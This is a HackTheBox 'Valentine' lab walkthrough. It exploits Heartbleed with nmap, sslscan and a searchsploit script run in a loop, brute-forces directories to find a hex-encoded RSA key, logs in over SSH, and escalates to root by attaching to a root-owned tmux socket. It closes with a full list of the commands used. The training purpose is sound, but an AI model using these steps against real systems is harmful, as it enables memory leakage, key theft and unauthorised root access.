We used HackTheBox Valentine machine to demonstrate HeartBleed Vulnerability and privilege escalation through tmux terminal multiplexer. Valentine is a very unique medium difficulty machine which focuses on the Heartbleed vulnerability, which had devastating impact on systems across the globe.

Heartbleed Vulnerability Exploitation

My initial step was to exploit the Heartbleed vulnerability.

  • The machine was running an older version of OpenSSL, making it susceptible to Heartbleed.
  • This vulnerability allowed me to send random data to the server, and in return, the server responded with random chunks of its memory.
  • By exploiting Heartbleed, I managed to reveal a Base64 encoded string.
  • Decoding this string provided me with a password for an RSA private key.
  • I explored multiple ways to test for and exploit Heartbleed:
    • Using an Nmap script: nmap --script ssl-heartbleed <target_ip> -p 443
    • Using the ssl-scan tool: ssl-scan --heartbleed <target_ip>
    • Using a Python exploit script that I found via searchsploit. I ran it like this: python heartbleed.py 10.10.10.79.
  • To automate the process of extracting useful data, I used a for loop in Bash, piping the output to grep -v "00000000" to filter out empty lines.
  • Once I had the Base64 string, I decoded it using: echo "<base64_string>" | base64 -d.

Directory Brute-forcing and RSA Key Discovery

After obtaining the password, my next step was to find the RSA private key.

  • I performed directory brute-forcing using gobuster. My command looked something like this:Bashsudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
  • This revealed a directory named /dev/, which contained a file with hex-encoded content called hype.key.
  • I downloaded the file using wget https://<target_ip>/dev/hype.key --no-check-certificate.
  • To decode the hex content into an ASCII RSA private key, I used xxd: cat hype.key | xxd -r -p > rsa_encrypted.

SSH Access

With the encrypted RSA key and its password, I could finally gain SSH access.

  • I used the password I found earlier to decrypt the RSA private key using OpenSSL: openssl rsa -in rsa_encrypted -out rsa_decrypted.
  • Then, I used the decrypted private key to log in via SSH as the user “hype”: ssh -i rsa hype@10.10.10.79.
  • Once logged in, I quickly checked the system information with uname -a.

Privilege Escalation via Tmux

Now that I had a user shell, my focus shifted to privilege escalation.

  • I investigated running processes and found a Tmux session running as root by using ps aux | grep tmux. The session was located at /dev/dev_session.
  • I checked the permissions of the Tmux session file using ls -la /dev/. I discovered that the “hype” user had write access to this Tmux session file.
  • By attaching to this existing Tmux session, I effectively gained root access. The command I used was: tmux -S /dev/dev_session.
  • From there, I navigated to the root directory (cd /root) and retrieved the root.txt flag using cat root.txt.

Technical Commands I Used:

Here’s a comprehensive list of the commands I used or referenced during the walkthrough:

  • Nmap:
    • nmap <target_ip>
    • nmap --script ssl-heartbleed <target_ip> -p 443
  • SSLScan (or SSLyze):
    • sslyze --heartbleed <target_ip>
  • SearchSploit:
    • searchsploit heartbleed
    • searchsploit -m <exploit_path>
  • Python (for running exploits):
    • python <exploit_script.py> <target_ip>
    • python heartbleed.py 10.10.10.79
  • Grep:
    • grep -v "00000000"
  • Bash For Loop:
    • for i in $(seq 1 100); do python <exploit.py> <target_ip> | grep -v "00000000" > output$i; done
  • Echo and Base64:
    • echo "<base64_string>" | base64 -d
  • GoBuster:
    • sudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
  • Wget:
    • wget https://<target_ip>/dev/hype.key --no-check-certificate
  • Cat:
    • cat hype.key
  • xxd:
    • cat hype.key | xxd -r -p
    • cat hype.key | xxd -r -p > rsa_encrypted
  • OpenSSL:
    • openssl rsa -in rsa_encrypted -out rsa_decrypted
  • SSH:
    • ssh -i rsa hype@10.10.10.79
  • uname:
    • uname -a
  • ps:
    • ps aux | grep tmux
  • ls:
    • ls -la /dev/
  • Tmux:
    • tmux -S /dev/dev_session
  • cd:
    • cd /root
  • cat (for flag):
    • cat root.txt
  • Curl (seen in the root flag content):
    • curl -i -X POST -A "..." http://<target_ip>/decode.php --cookie "..." --data-binary "text=..." -o /dev/null

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles